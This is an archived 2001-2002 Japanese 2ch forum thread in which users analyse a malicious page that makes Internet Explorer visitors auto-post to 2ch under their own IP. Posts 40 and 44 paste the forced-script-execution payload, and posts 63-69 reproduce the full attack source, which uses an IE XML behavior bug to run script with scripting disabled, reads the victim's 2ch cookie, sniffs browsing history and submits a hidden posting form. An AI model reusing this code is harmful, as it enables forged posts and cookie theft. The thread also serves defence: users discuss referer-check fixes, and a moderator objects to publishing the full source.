またもや２ｃｈの危機です！！

1 ： ：01/12/17 18:01

ttp://ｗｗｗ2j.biglobe.ne.jp/~tatuta/cgi-bin/paint/20.gif
「末尾の数字はいろいろ」
このリンクをブラウザから踏むとＩＰを抜かれ自動的にスレをたてて
しまうので興味本位でおさないようにしましょう。
今のところ半角、厨房、で被害拡大中
------------------------------
ソースhttp://choco.2ch.net/test/read.cgi/news/1008577522/l50

27 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:16

>>26
で砂。xml:やらmain()やら。

28 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:18

よく事情を理解していないのだけれども　referer みて2ch以外からの投稿禁止にしておけばいいんじゃないの？

29 ：28 ：01/12/17 23:23

だめらしいな。

------------------------------------------------------------------
104　心得をよく読みましょう　sage　01/12/17 23:13 ID:4EGFRoLh
>>90
IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使って
Refererを偽装しているから無駄
------------------------------------------------------------------

30 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:24

>>28
script 内で referer は偽造できるらしい。ので無駄。
まあなんか 2ch サイドで対策始めたらしいのでとりあえずは収まるっしょ。
つうことで寝よ寝よ。

まあしかし DDoS は恐いね。あと IE のバグ/仕様も(ﾟдﾟ;)ｺﾜｰ

31 ：1 ：01/12/17 23:25

なんかよく分からないけどがんばってください

32 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:29

プログラム冒頭より

<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png"></noscript>
<![endif]-->

What's?

33 ：28 ：01/12/17 23:33

IPアドレス固定の研究室内で隠れ２チャネラやっている私にとっては結構重要な問題だったりする(藁

34 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:34

>JavaScript を OFF にしててもくらうという報告がこのスレにはある。
そいつはたぶんJavaをoffにしただけで、ActiveScriptはoffにしなかったのだろう。

35 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:40

ｘｍｌが悪い

36 ：あぼーん ：あぼーん

あぼーん

37 ：あぼーん ：あぼーん

あぼーん

38 ：あぼーん ：あぼーん

あぼーん

39 ：あぼーん ：あぼーん

あぼーん

40 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:46

ここが悪い

<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>

41 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:47

チェック
http://www.eucaly.net/~kei/test/check.html

IE5.5/6だとJAVAScript切っても実行されちゃうんだけど、
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
を削ると動かなくなるんだよね。
これってなんなのさ？

42 ：　 ：01/12/17 23:47

79 ：心得をよく読みましょう ：01/12/17 23:10 ID:4EGFRoLh
JavaScriptに関しての結論

IE5.5以降ではアクティブスクリプトをオフにしても無駄
このバグ(仕様?)を利用している。
http://www2.sala.or.jp/~uuu/dhtml/forcescript.html
IE5.01なら問題なし

43 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:53

>削除屋さん

http://pc.2ch.net/test/read.cgi/unix/1008579712/

36-39です。

住人がソース検証している模様。

44 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:53

>42
消えてる？
<script id=scr1 language=JScript for=window event=onload>
alert('Hello World');
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>

当方Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)で
ActiveX JAVA JAVAScript 切ってるんだけど、上のやつは実行されないんだよね。

45 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:55

削除屋さん、流れを読んでくだせえ。

46 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:55

＞IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使ってRefererを偽装しているから無駄

↑これは間違い。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのようにしても２ｃｈは２ｃｈ内からの書き込みだと判断してしまうのが問題。
したがって、２つ目の例では書き込めないようにすれば良い。

47 ：削除屋 ★ ：01/12/17 23:57

>>45　すまん。ソース全部貼るのは許して。

48 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:57

...しかしこれってIEの話うにっくす板の内容じゃない気が。

49 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:58

検証のためだったけど…削除屋さん、ソース全部張ってスイマセン。

50 ：43 ：01/12/18 00:00

43です、誤爆ｽﾏｿ

>>45
管理者側が恒久的対策を宣言していない状況での全ソース公開は
まずいと思われるので批判要望板で報告しました。

部分的に公開してやりとりする分にはOKかと思いますが・・・

51 ：名無しさん＠お腹いっぱい。 ：01/12/18 00:00

メールで…
進行しては…
どうですか

52 ：削除屋 ★ ：01/12/18 00:00

>>49 unix板の方にはいつも感謝ですけど、誰が覗き見して誰がどう悪用するかわかんないので、、ｽﾏｿ

53 ：45 ：01/12/18 00:02

ああ。僕の考え足らずでした。ｽﾏｿ｡

>>48
ｿｰｽﾊｯｸはUNIX板の住人さん達にとっては
勉強、もしくはゲームなのでは。

54 ：名無しさん＠お腹いっぱい。 ：01/12/18 00:05

彼がきてからマ板は危機です。 TT

55 ：13 ：01/12/18 00:11

>>52
こんなにソース出回ってるのに、そういう対策はどうかと。

56 ：28 ：01/12/18 00:16

解決策っぽいのが出ているようだけどどうなんでしょ？

-----------------------------------------------------------------------
563　心得をよく読みましょう　　01/12/18 00:11 ID:9aT/CaI4
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのような場合でも2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、２つ目の例では書き込めないように2chのCGIを、
if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば１００％絶対に自動的に書き込めなくなります。
IEにRefererを偽装する機能もバグも存在しません。


574　心得をよく読みましょう　sage　01/12/18 00:13 ID:TmX2ONFn
>>563
暫定措置としてはいいと思うけど
http://hoge.com/hoge.gif?http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
ってのがすぐ出回ると思われ。


585　104　sage　01/12/18 00:14 ID:pkTuEHYy
>>574
/^
で、「先頭が」 2ch.net じゃないと引っかかるので100%大丈夫です。

57 ：jjj ：01/12/18 00:21

うーん。
意味無いとおもうんだけど。
リファラって自由に設定できそうなんだけど、間違ってます？

58 ：名無しさん＠お腹いっぱい。 ：01/12/18 00:24

間違ってます。てかもうかなり沈静化した模様。

59 ：28 ：01/12/18 00:31

>>57
Referer自体は偽造できそうだけど、広く出回っているブラウザ上で偽造してリクエストを送ることが出来ない
ので今回のような事態を回避できるんじゃないかと思うんですが。
2chアタック用の特製ブラウザやボット相手には通じないけど、そういうのには既に別の対策がしてあるんじゃ
ないかな？

60 ：名無しさん＠お腹いっぱい。 ：01/12/18 00:44

ほ、放置なのか・・・＜ML

61 ：名無しさん＠お腹いっぱい。 ：01/12/18 01:27

母体を仕掛ける先が明らかだから、ワームとしては運用しにくいと思われ。
まあそのへんのマシンを踏み台に使えばいいんだけど（藁

62 ：1 ：01/12/18 16:33

このスレは多分終了しました。
ご協力ありがとうございました。

63 ：名無しさん＠お腹いっぱい。 ：01/12/21 22:59

<!DOCTYPE>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.pn
g"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png" id=img
1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>

64 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:00

<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>

var NAME='';
var TAR='';

function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';

65 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:01

f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Ｗｅｌｃｏｍｅ ｔｏ 裏２ちゃんねる！';
}
var ura2=false;

if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){

66 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:01

f1.MESSAGE.value='guest guest\nＷｅｌｃｏｍｅ ｔｏ 裏２ちゃんねる！\n'+p
arent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}

function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){

67 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:01

t1='http://tmp.2ch.net/kitchen/';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}

main();

function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';

68 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:02

t1+='<\/script><noscript><xml:namespace prefix=t /><?import namespace=t implemen
tation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWind
ow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}

function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}

function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[
1])}}
return '';
}

function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');

69 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:02

a1.href=t3+String(i)+'/l50';
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}

</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHT
ML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>

70 ：名無しさん＠お腹いっぱい。 ：02/02/27 23:16

もりあがり期待あげ

71 ：名無しさん＠お腹いっぱい。 ：02/03/04 21:11

まつりだまつりだ

72 ：名無しさん＠お腹いっぱい。 ：02/03/09 14:33

73 ：名無しさん＠お腹いっぱい。 ：02/03/10 23:08

まつつつつｔ

74 ：名無しさん＠お腹いっぱい。 ：02/03/29 19:08

ききです。黄門も閉鎖された

75 ：名無しさん＠お腹いっぱい。 ：02/05/11 20:59

感動age

read.cgi ver5.26+ (01/10/21-)